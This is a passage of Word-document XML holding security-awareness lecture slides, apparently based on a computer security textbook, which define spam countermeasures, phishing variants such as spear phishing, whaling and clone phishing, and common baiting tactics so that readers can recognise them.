          <w:color w:val="93a299"/>
          <w:sz w:val="40.84000015258789"/>
          <w:szCs w:val="40.8400001525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Spam countermeasures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73583984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328"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Laws against spam exist but are generally ineffective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66748046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="978.8788604736328" w:right="0" w:firstLine="0"/>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Email filters have become very effective for most spam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66748046875" w:line="240.14419555664062" w:lineRule="auto"/>
        <w:ind w:left="1261.2674713134766" w:right="2420.078125" w:hanging="282.38861083984375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="39.959999084472656"/>
          <w:szCs w:val="39.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Internet service providers use volume limitations to make  spammers‘ jobs more difficult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4267425537109" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="188.78555297851562" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>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292934"/>
          <w:sz w:val="18.959999084472656"/>
          <w:szCs w:val="18.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security in Computing, Fifth Edition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="18.959999084472656"/>
          <w:szCs w:val="18.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.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Phishing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1600341796875" w:line="216.10852718353271" w:lineRule="auto"/>
        <w:ind w:left="452.7167510986328" w:right="1118.831787109375" w:hanging="266.49715423583984"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>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57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing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 Cybercriminal attempts to steal  personal and financial information or infect  computers and other devices with malware and  viruses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036865234375" w:line="240.03507614135742" w:lineRule="auto"/>
        <w:ind w:left="618.2196044921875" w:right="434.124755859375" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>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Designed to trick you into clicking a link or  providing personal or financial information </w:t>
      </w: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Often in the form of emails and websites </w:t>
      </w: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May appear to come from legitimate companies,  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">organizations or known individuals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20947265625" w:line="216.06263637542725" w:lineRule="auto"/>
        <w:ind w:left="917.7540588378906" w:right="561.05712890625" w:hanging="299.5344543457031"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="57.959999084472656"/>
          <w:szCs w:val="57.959999084472656"/>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Take advantage of natural disasters, epidemics,  health scares, political elections or timely events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Phishing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960205078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="200.61241149902344" w:right="0" w:firstLine="0"/>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Different forms such as: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33251953125" w:line="208.07036876678467" w:lineRule="auto"/>
        <w:ind w:left="918.6416625976562" w:right="309.833984375" w:hanging="304.0472412109375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>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50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mass Phishing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 Mass, large-volume attack intended to  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reach as many people as possible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68115234375" w:line="208.07012557983398" w:lineRule="auto"/>
        <w:ind w:left="884.5836639404297" w:right="204.99267578125" w:hanging="269.98924255371094"/>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50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whaling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 Type of spear phishing attack that targets ―big  fish,‖ including high-profile individuals or those with a  great deal of authority or access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7421875" w:line="208.0702543258667" w:lineRule="auto"/>
        <w:ind w:left="887.0856475830078" w:right="127.435302734375" w:hanging="272.49122619628906"/>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50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clone Phishing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 Spoofed copy of a legitimate and  previously delivered email, with original attachments or  hyperlinks replaced with malicious versions, which is sent  from a forged email address so it appears to come from  the original sender or another legitimate source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650634765625" w:line="223.88164043426514" w:lineRule="auto"/>
        <w:ind w:left="614.5944213867188" w:right="144.537353515625" w:firstLine="0.021209716796875"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="arial" w:cs="arial" w:eastAsia="arial" w:hAnsi="arial"/>
          <w:b w:val="1"/>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52000045776367"/>
          <w:szCs w:val="42.52000045776367"/>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50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advance-Fee Scam: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="50.08000183105469"/>
          <w:szCs w:val="50.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Requests the target to send money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or bank account information to the cybercriminal </w:t>
      </w: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292934"/>
          <w:sz w:val="50.040000915527344"/>
          <w:szCs w:val="50.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear Phishing…..</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5995178222656"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Spear Phishing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60009765625" w:line="239.90389823913574" w:lineRule="auto"/>
        <w:ind w:left="481.0400390625" w:right="990.06103515625" w:hanging="281.7360305786133"/>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Spear phishing is on the rise because it works. Traditional  security defences do not detect and stop it.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29345703125" w:line="243.33595275878906" w:lineRule="auto"/>
        <w:ind w:left="199.30400848388672" w:right="349.4995117187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From a cyber criminal‘s point of view, spear phishing is the  perfect vehicle for a broad array of damaging exploits.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Threat actors are increasingly targeting executives and other  high-level employees, tricking them into activating malware  that gives criminals access into their companies‘  environments.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677001953125" w:line="244.02737617492676" w:lineRule="auto"/>
        <w:ind w:left="199.30400848388672" w:right="351.420898437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This might be ransomware that encrypts company data, then  extorts fees from the victim to remediate the situation.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Targeted executives are usually key leaders with titles such  as chief financial officer, head of finance, senior vice  president and director.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5995178222656"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Spear Phishing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360107421875" w:line="239.90415573120117" w:lineRule="auto"/>
        <w:ind w:left="484.87998962402344" w:right="1279.022216796875" w:hanging="285.5759811401367"/>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Spear phishing emails tend to have enough detail to fool  even experienced security professionals.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16650390625" w:line="239.90398406982422" w:lineRule="auto"/>
        <w:ind w:left="484.87998962402344" w:right="1437.18017578125" w:hanging="285.5759811401367"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>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phishing campaign may blanket an entire database of  email addresses, but spear phishing targets specific  individuals within specific organizations with a specific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mission.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17138671875" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="482.95997619628906" w:right="1075.02197265625" w:hanging="283.6559677124023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By mining social networks for personal information, an  attacker can write emails that are extremely accurate and  compelling.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232421875" w:line="239.90394115447998" w:lineRule="auto"/>
        <w:ind w:left="472.3999786376953" w:right="348.782958984375" w:hanging="273.095970153808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Once the target clicks on a link or opens an attachment, the  attacker establishes a foothold in the network, enabling them  to complete their illicit mission.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2275390625" w:line="240.07061004638672" w:lineRule="auto"/>
        <w:ind w:left="199.30400848388672" w:right="2638.29833984375" w:firstLine="0"/>
        <w:jc w:val="center"/>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84% of organizations said a spear-phishing attack  successfully penetrated their organization in 2015</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17761993408203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Baiting Tactics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2928466796875" w:line="239.94571208953857" w:lineRule="auto"/>
        <w:ind w:left="525.1999664306641" w:right="779.342041015625" w:hanging="273.095970153808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48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification from a help desk or system administrator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Asks you to take action to resolve an issue with your  account (e.g., email account has reached its storage limit),  which often includes clicking on a link and providing  requested information.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483276367188" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="523.280029296875" w:right="339.1796875" w:hanging="271.17603302001953"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="arial" w:cs="arial" w:eastAsia="arial" w:hAnsi="arial"/>
          <w:b w:val="1"/>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48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advertisement for immediate weight loss, hair growth or  fitness prowess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79931640625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="523.7644195556641" w:right="859.981689453125" w:firstLine="18.235549926757812"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>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Serves as a ploy to get you to click on a link that will infect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your computer or mobile device with malware or viruses.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17761993408203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72.04000091552734"/>
          <w:szCs w:val="72.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Baiting Tactics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934326171875" w:line="208.04563522338867" w:lineRule="auto"/>
        <w:ind w:left="537.8575897216797" w:right="424.94384765625" w:hanging="287.5343704223633"/>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44.040000915527344"/>
          <w:szCs w:val="44.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attachment labeled “invoice” or “shipping order”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Contains malware that can infect your computer or mobile device  if opened. May contain what is known as ―ransomware,‖ a type of  malware that will delete all files unless you pay a specified sum of  money.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689697265625" w:line="208.09109687805176" w:lineRule="auto"/>
        <w:ind w:left="523.3244323730469" w:right="395.87890625" w:hanging="273.00121307373047"/>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44.040000915527344"/>
          <w:szCs w:val="44.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification from what appears to be a credit card company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Indicates someone has made an unauthorized transaction on  your account. If you click the link to log in to verify the transaction,  your username and password are collected by the scammer.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6060791015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="250.3232192993164" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="arial" w:cs="arial" w:eastAsia="arial" w:hAnsi="arial"/>
          <w:b w:val="1"/>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93a299"/>
          <w:sz w:val="37.44000244140625"/>
          <w:szCs w:val="37.44000244140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44.040000915527344"/>
          <w:szCs w:val="44.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fake account on a social media site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08743476867676" w:lineRule="auto"/>
        <w:ind w:left="534.3344116210938" w:right="611.673583984375" w:firstLine="16.324005126953125"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="44.040000915527344"/>
          <w:szCs w:val="44.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="44.08000183105469"/>
          <w:szCs w:val="44.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimics a legitimate person, business or organization. May also  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="44.040000915527344"/>
          <w:szCs w:val="44.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">appear in the form of an online game, quiz or survey designed to  collect information from your account.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7143859863281" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.04000091552734"/>
          <w:szCs w:val="80.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.04000091552734"/>
          <w:szCs w:val="80.04000091552734"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Lure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5328369140625" w:line="239.73289489746094" w:lineRule="auto"/>
        <w:ind w:left="710.4267883300781" w:right="9397.208251953125" w:hanging="300.29762268066406"/>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93a299"/>
          <w:sz w:val="47.63999938964844"/>
          <w:szCs w:val="4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Often makes it  look like a  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="19050" distT="19050" distL="19050" distR="19050" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2990122</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>159322</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5363337" cy="4349623"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="left" distB="19050" distT="19050" distL="19050" distR="1905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63337" cy="4349623"/>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70849609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="705.3832244873047" w:right="0" w:firstLine="0"/>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problem with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33056640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="692.4940490722656" w:right="0" w:firstLine="0"/>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one of your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33056640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="693.0544281005859" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="56.040000915527344"/>
          <w:szCs w:val="56.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="56.040000915527344"/>
          <w:szCs w:val="56.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts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1309814453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="838.5039520263672"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Or they try to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39.87059593200684" w:lineRule="auto"/>
        <w:ind w:left="1121.679916381836" w:right="9080.457153320312" w:hanging="10.0743103027343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takes advantage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of an ongoing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40966796875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1136.0799407958984"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humanitarian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996337890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1124.0799713134766"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crisis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9.1467094421387" w:lineRule="auto"/>
        <w:ind w:left="1260.3998565673828" w:right="1502.178955078125" w:hanging="696.2846374511719"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can you detect a phishing scam? </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="7033387" cy="462648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033387" cy="462648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436725616455" w:lineRule="auto"/>
        <w:ind w:left="1252.1599578857422" w:right="1076.817626953125" w:hanging="688.0447387695312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can you detect a phishing scam? </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="80.08000183105469"/>
          <w:szCs w:val="80.08000183105469"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="7308724" cy="5501767"/>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308724" cy="550176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15997314453125"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Common phishing scam Subject Lines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60205078125" w:line="239.90405559539795" w:lineRule="auto"/>
        <w:ind w:left="255.99998474121094" w:right="1394.97802734375" w:firstLine="15.120010375976562"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000b3a"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
